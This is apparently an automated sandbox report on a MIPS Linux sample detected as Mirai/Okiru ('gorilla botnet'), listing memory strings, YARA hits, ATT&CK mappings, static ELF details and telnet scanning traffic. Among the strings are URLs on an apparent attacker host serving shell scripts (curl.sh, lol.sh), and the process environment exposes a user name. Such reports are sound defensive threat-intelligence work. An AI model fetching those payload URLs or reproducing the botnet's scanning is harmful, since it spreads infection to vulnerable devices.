Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/resgen!/usr/bin/x11perfcomp/us1/usr/bin/qemu-microblazeel
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/foo2hbpl21/usr/bin/xfce4-popup-applicationsmenu!/usr/bin/ppdpo1/usr/bin/qemu-ppcips/s10!/usr/bin/rvim0!/usr/bin/pf2afm1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-checkvm
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/purple-send!/usr/bin/gzip1/usr/bin/systemd-notify10!/usr/bin/less0!/usr/bin/qemu-sparc1/usr/bin/grub-mkstandalone
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/delv0!/usr/bin/python1/usr/bin/qemu-armips/s10!/usr/bin/foo2lava1/usr/bin/xfce4-appearance-settings1/usr/bin/bzexe/mips/10!/usr/bin/luac5.31/usr/bin/systemd-socket-activate1/usr/bin/mono-find-provides
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /mips/usr/bin/qemu-alpha
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-vgauth-smoketest
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/pa-info!/usr/bin/xdpyinfo1/usr/bin/hciconfigps/s10!/usr/bin/ristretto!/usr/bin/sleep1/usr/bin/xfce4-popup-notes0!/usr/bin/qemu-ppc64le!/usr/bin/wdctl1/usr/bin/zgrep/mips/10!/usr/bin/tty0!/usr/bin/mdoc1/usr/bin/desktop-file-edit
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/dev/dvd0 /dev/vmci1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/hp-pkservice!/usr/bin/preunzip1/usr/bin/systemd-hwdbs10!/usr/bin/sg_map26!/usr/bin/setterm1/usr/bin/sg_zonemips/s10!/usr/bin/viewres!/usr/bin/bzcat!/usr/bin/mdbrebaseps/us1/usr/bin/vmware-vmblock-fuse
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc64abi32
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmwarectrl
Source: mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmp	Binary or memory string: %s/qemu-op
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/dbus-send!/usr/bin/toe1/usr/bin/qemu-aarch64s10!/usr/bin/pdfseparate!/usr/bin/nc1/usr/bin/mmcli/mips/s10!/usr/bin/bwrap0!/usr/bin/hp-plugin1/usr/bin/podcheckers/s10!/usr/bin/kbxutil!/usr/bin/xrdb1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-vgauth-cmd
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/xhost0!/usr/bin/mutter1/usr/bin/monodocs2slashdoc0!/usr/bin/paperconf!/usr/bin/cli-al1/usr/bin/bdftruncate/10!/usr/bin/mt01/usr/bin/qemu-aarch64_be1/usr/bin/xdg-user-dirs-update
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-vmblock-fuse
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/usr/bin/qemu-cris1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-x86_64
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/10 /usr/bin/perldoc!/usr/bin/vmhgfs-fuse1/usr/bin/thunar-settings
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sparc
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/usr/bin/qemu-alpha
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/stty0!/run/vmware
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/ping60!/usr/bin/sg_write_long1/usr/bin/mate-calcps/s10!/usr/bin/qemu-s390x!/usr/bin/ionice1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/cert-sync!/usr/bin/qemu-riscv321/usr/bin/byobu-select-profile0!/usr/bin/catman0!/usr/bin/jsondiff1/usr/bin/qemu-mips64els10!/usr/bin/link0!/usr/bin/man-recode1/usr/bin/select-editors10!/usr/bin/printafm!/usr/bin/pycompile1/usr/bin/ntfsfallocates10!/usr/bin/psfxtable!/usr/bin/factor1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-riscv64
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-armeb
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-rpctool
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-m68k
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /run/vmware
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmhgfs-fuse
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/mktemp0!/usr/bin/qemu-xtensa1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10!/usr/bin/qemu-mips!/usr/bin/pax11publish1/usr/bin/bzip2/mips/s10!/usr/bin/xbiff0!/usr/bin/ucs2any1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/10 /usr/bin/tificc0!/usr/bin/al21/usr/bin/vmware-vgauth-smoketest
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /dev/vmci
Source: mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.zlEnOZ
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/us1/usr/bin/ruby/mips/0!/usr/bin/fwupdagent!/usr/bin/lzgrep/mips/us1/usr/bin/xfce4-panel-profiles0!/usr/bin/readlink!/usr/bin/lprU/mips/us1/usr/bin/linux-update-symlinks0!/usr/bin/splitfont!/usr/bin/isoinfomips/us1/usr/bin/dbus-cleanup-sockets0!/usr/bin/umount!/usr/bin/sudoreplays/us1/usr/bin/qemu-ppc64abi320!/usr/bin/setlogcons!/usr/bin/xz
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-i386
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/gsnd0!/usr/bin/fc-validate1/usr/bin/mdig/mips/s10!/usr/bin/ssh01/usr/bin/btrfs-find-root1/usr/bin/objcopymips/s10!/usr/bin/sdptool!/usr/bin/startx1/usr/bin/x86_64-linux-gnu-cpp-90!/usr/bin/qemu-sh4!/usr/bin/codepage1/usr/bin/Thunar/mips/s10!/usr/bin/pstree0!/usr/bin/ss1@v!
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /tmp/vmware-root_727-4290690966
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-or1k
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmwarectrl
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/pod2usage!/usr/bin/gprof1/usr/bin/qemu-xtensaebs10!/usr/bin/dirmngr-client!/usr/bin/rlogin1/usr/bin/min12xxwips/s10!/usr/bin/fwupdate!/usr/bin/lsusb1/usr/bin/dtd2rngmips/s10!/usr/bin/Xorg0!/usr/bin/lzless1@
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/ntfstruncate!/var/run/acpid.socket1/usr/bin/grub-fstest/10!/usr/bin/pdf2ps0!/var/run/vmware1/usr/bin/ssh-import-id-gh
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U!/usr/bin/vmtoolsd
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-alpha
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/vmware-namespace-cmd
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-sh4eb
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/pyjwt30!/usr/bin/qemu-x86_64U1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sparc64
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /mips/usr/bin/vmwarectrl
Source: mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/mips.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mips.nn.elf
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-xtensaeb
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/proc/3246/exe!/proc/3429/exet/mips/pr!/run/snapd.socketips/tm1/usr/bin/qemu-microblaze
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-xtensa
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/10 /usr/bin/netcat01/usr/bin/xfce4-settings-editor`!/usr/bin/unlzma1/usr/bin/qemu-ppc64s/s10!/usr/bin/nstat0!/usr/bin/jjs1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: P /usr/bin/qemu-cris
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp, mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-tilegx
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: !/usr/bin/uuidgen1/usr/bin/byobu-keybindings0!/usr/bin/GET0!/usr/bin/znew1/usr/bin/qemu-or1kps/s10!/usr/bin/openvt0!/usr/bin/lspgpot1
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: U/mips/s10 /usr/bin/nisdomainname!/usr/bin/apt1/usr/bin/tabs/mips/s10!/usr/bin/qemu-i386!/usr/bin/mkisofs1/usr/bin/grep/mips/s10!/usr/bin/rygel0!/usr/bin/qemu-m68k1/usr/bin/system-config-printer-applet!/usr/bin/hp-check1/usr/bin/md5sum.textutils1/usr/bin/aa-execmips/s10!/usr/bin/vdir0!/usr/bin/phar7.41
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-aarch64_be
Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsn32el

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: mips.nn.elf, type: SAMPLE
Source: Yara match	File source: 5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: mips.nn.elf, type: SAMPLE
Source: Yara match	File source: 5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mips.nn.elf PID: 5433, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: mips.nn.elf, type: SAMPLE
Source: Yara match	File source: 5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: mips.nn.elf, type: SAMPLE
Source: Yara match	File source: 5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mips.nn.elf PID: 5433, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	1 File Deletion	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mips.nn.elf	42%	ReversingLabs	Linux.Backdoor.Mirai
mips.nn.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://94.156.227.233/curl.sh	mips.nn.elf	false	high
http://94.156.227.233/lol.sh	mips.nn.elf	false	high
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	mips.nn.elf	false	high
http://94.156.227.233/	mips.nn.elf	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
114.171.214.248	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
123.238.41.160	unknown	India	18101	RELIANCE-COMMUNICATIONS-INRelianceCommunicationsLtdDAKC	false
46.235.136.66	unknown	Italy	197589	ALFANEWSIT	false
162.16.207.15	unknown	United States	35893	ACPCA	false
25.95.13.157	unknown	United Kingdom	7922	COMCAST-7922US	false
79.230.205.174	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
106.171.143.33	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
92.103.218.129	unknown	France	12670	AS-COMPLETELFR	false
131.47.77.23	unknown	United States	409	AFCONC-BLOCK1-ASUS	false
176.158.31.11	unknown	France	5410	BOUYGTEL-ISPFR	false
16.92.248.169	unknown	United States	unknown	unknown	false
187.205.15.107	unknown	Mexico	8151	UninetSAdeCVMX	false
73.158.5.250	unknown	United States	7922	COMCAST-7922US	false
124.46.93.136	unknown	Korea Republic of	4668	LGNET-AS-KRLGCNSKR	false
207.73.92.61	unknown	United States	237	MERIT-AS-14US	false
193.0.152.73	unknown	Russian Federation	198758	ASTELEKRU	false
158.22.228.197	unknown	United States	1504	DNIC-AS-01504US	false
185.204.137.224	unknown	Ireland	199256	LTH-ASIE	false
212.138.90.110	unknown	Saudi Arabia	8895	ISUInternetServicesUnitISUSA	false
38.116.126.9	unknown	United States	174	COGENT-174US	false
89.234.28.7	unknown	United Kingdom	15395	RACKSPACE-LONGB	false
175.235.81.175	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
198.185.241.102	unknown	United States	394612	UPMC-PHSUS	false
40.4.203.143	unknown	United States	4249	LILLY-ASUS	false
173.255.36.239	unknown	United States	1970	TAMUS-NETUS	false
85.71.211.239	unknown	Czech Republic	5610	O2-CZECH-REPUBLICCZ	false
179.225.107.21	unknown	Brazil	26599	TELEFONICABRASILSABR	false
21.127.118.106	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
134.49.149.213	unknown	United States	23138	FIRST-STEPUS	false
194.89.26.187	unknown	Finland	1759	TSF-IP-CORETeliaFinlandOyjEU	false
37.0.114.158	unknown	Germany	10780	PURE-STORAGEUS	false
148.221.95.25	unknown	Mexico	8151	UninetSAdeCVMX	false
100.61.74.33	unknown	United States	701	UUNETUS	false
142.188.170.28	unknown	Canada	577	BACOMCA	false
207.194.51.58	unknown	Canada	852	ASN852CA	false
38.177.215.166	unknown	United States	174	COGENT-174US	false
57.41.27.141	unknown	Belgium	2686	ATGS-MMD-ASUS	false
197.89.53.21	unknown	South Africa	10474	OPTINETZA	false
158.20.103.146	unknown	United States	1482	DNIC-AS-01482US	false
60.239.176.88	unknown	Japan	2518	BIGLOBEBIGLOBEIncJP	false
88.119.98.42	unknown	Lithuania	8764	TELIA-LIETUVALT	false
79.133.33.157	unknown	Germany	203833	AT-FIRSTCOLOAustriaAT	false
81.186.24.135	unknown	Greece	8248	GR-EDUNETGR	false
215.177.131.37	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
144.90.147.91	unknown	United States	6652	PIMA-COLLEGEUS	false
92.221.125.208	unknown	Norway	29695	ALTIBOX_ASNorwayNO	false
122.3.67.242	unknown	Philippines	9299	IPG-AS-APPhilippineLongDistanceTelephoneCompanyPH	false
82.190.169.163	unknown	Italy	3269	ASN-IBSNAZIT	false
36.220.67.2	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
180.219.174.220	unknown	Hong Kong	17924	SMARTONE-MB-AS-APSmarToneMobileCommunicationsLtdHK	false
129.76.65.112	unknown	United States	2902	WN-WY-ASUS	false
173.104.161.185	unknown	United States	1239	SPRINTLINKUS	false
12.244.58.105	unknown	United States	7018	ATT-INTERNET4US	false
178.135.97.139	unknown	Lebanon	42003	OGERONETOGEROTelecomLB	false
215.3.75.75	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
65.185.252.214	unknown	United States	16787	CHARTER-16787-DCUS	false
46.62.214.21	unknown	Iran (ISLAMIC Republic Of)	16322	PARSONLINETehran-IRANIR	false
22.240.106.198	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
12.12.27.70	unknown	United States	32328	ALASCOM-IP-MANAGED-NETWORKUS	false
186.116.34.231	unknown	Colombia	3816	COLOMBIATELECOMUNICACIONESSAESPCO	false
158.211.143.99	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
12.138.17.22	unknown	United States	7018	ATT-INTERNET4US	false
89.110.32.213	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
119.250.63.90	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
186.52.142.205	unknown	Uruguay	6057	AdministracionNacionaldeTelecomunicacionesUY	false
222.90.52.105	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
221.141.199.204	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
192.47.235.205	unknown	Japan	5501	FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe	false
193.42.34.225	unknown	Germany	3221	EENET-ASEE	false
46.196.44.254	unknown	Turkey	47524	TURKSAT-ASTR	false
37.151.174.83	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
155.145.125.114	unknown	United Kingdom	1221	ASN-TELSTRATelstraCorporationLtdAU	false
49.252.15.30	unknown	Japan	37903	EMOBILEYmobileCorporationJP	false
99.29.22.148	unknown	United States	7018	ATT-INTERNET4US	false
141.132.77.8	unknown	Australia	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	false
186.216.174.221	unknown	Brazil	262753	VOCETELECOMUNICACOESLTDABR	false
153.242.20.149	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
182.96.202.150	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
209.50.30.196	unknown	United States	15108	ALLO-COMMUS	false
93.37.49.195	unknown	Italy	12874	FASTWEBIT	false
215.235.57.72	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
132.15.117.214	unknown	United States	409	AFCONC-BLOCK1-ASUS	false
165.95.81.150	unknown	United States	1970	TAMUS-NETUS	false
202.145.152.143	unknown	Taiwan; Republic of China (ROC)	9924	TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi	false
44.194.239.200	unknown	United States	14618	AMAZON-AESUS	false
203.42.234.208	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
202.212.151.129	unknown	Japan	2514	INFOSPHERENTTPCCommunicationsIncJP	false
52.151.73.99	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
144.26.145.231	unknown	United States	29848	WCUUS	false
1.235.239.80	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
81.235.23.99	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	false
198.109.38.100	unknown	United States	237	MERIT-AS-14US	false
125.148.154.29	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
215.179.148.91	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
8.45.209.183	unknown	United States	30453	PATRICK-SOLUTIONS-INCUS	false
38.98.109.142	unknown	United States	18698	IAC-NYC-AS01US	false
20.181.7.34	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
171.93.229.84	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
204.208.92.154	unknown	United States	5972	DNIC-ASBLK-05800-06055US	false
11.120.224.250	unknown	United States	27651	ENTELCHILESACL	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/etc/motd

Download File

Process:	/tmp/mips.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/tmp/qemu-open.zlEnOZ (deleted)

Download File

Process:	/tmp/mips.nn.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.4992275471326932
Encrypted:	false
SSDEEP:	3:TgaLOln:TgAKn
MD5:	3B2A108EB9BDAC564681D1D50B5B8E8F
SHA1:	E744F918D99769B49D0C6E8CBEDD4A1590CBBD1E
SHA-256:	B89FE9B42F66509FF52B529092B42F8D759FB8E03059E8CC4039940A45287D87
SHA-512:	52A5D2AB05D38B4EEE703B8344837CA7B890D6C8CC32C7AAEE8F128EBBE5F45A92A72A54E8A14B4DB61E9E7E002CED615B52E7503F50FB46AD8738921B1C98A5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	/tmp/mips.nn.elf.

Static File Info

General

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.712211284941116
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	mips.nn.elf
File size:	135'112 bytes
MD5:	2145cb16a925a273d569c25257eb701a
SHA1:	821c929b723b9c69683f96b921132e0ff98ac9a1
SHA256:	beeeaa8013f74e611c30f4a99aebe4f5e38f3403a3d8314379428ab0a1ddd244
SHA512:	b40814b92ba58edd3cf9814877ba6a9a3538fb2e748b18d49e731b9f7459ff1f3ed47b25781b82df8f61e51288cfd956a0138e71f8aa75f3c9893a8676fd596c
SSDEEP:	3072:M1syNDJJX/gcGzGZsJs/3e+CjxshzgnnuKCXO:osyNDJJX/gclK2mxRC+
TLSH:	A2D3D71E6E318F6DF769C33947B78A20979837C627D0C685D27CE9211E6034E641FBA8
File Content Preview:	.ELF.....................@.`...4.........4. ...(.............@...@...........................E...E........1(........dt.Q............................<...'..L...!'.......................<...'..(...!... ....'9... ......................<...'......!........'9.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	134552
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x1cd00	0x0	0x6	AX	16
.fini	PROGBITS	0x41ce20	0x1ce20	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x41ce80	0x1ce80	0x3010	0x0	0x2	A	16
.ctors	PROGBITS	0x45fe94	0x1fe94	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x45fe9c	0x1fe9c	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x45fea8	0x1fea8	0x138	0x0	0x3	WA	4
.data	PROGBITS	0x45ffe0	0x1ffe0	0x610	0x0	0x3	WA	16
.got	PROGBITS	0x4605f0	0x205f0	0x744	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x460d34	0x20d34	0x20	0x0	0x10000003	WAp	4
.bss	NOBITS	0x460d60	0x20d34	0x225c	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0xdec	0x20d34	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x20d34	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x1fe90	0x1fe90	5.7248	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x1fe94	0x45fe94	0x45fe94	0xea0	0x3128	4.4252	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 00:46:56.375138044 CET	33858	23	192.168.2.13	43.191.190.218
Dec 15, 2024 00:46:56.379261971 CET	44548	38242	192.168.2.13	94.156.227.234
Dec 15, 2024 00:46:56.391551971 CET	58018	23	192.168.2.13	70.6.24.70
Dec 15, 2024 00:46:56.421689987 CET	43514	23	192.168.2.13	150.2.161.109
Dec 15, 2024 00:46:56.438090086 CET	35288	23	192.168.2.13	213.134.46.100
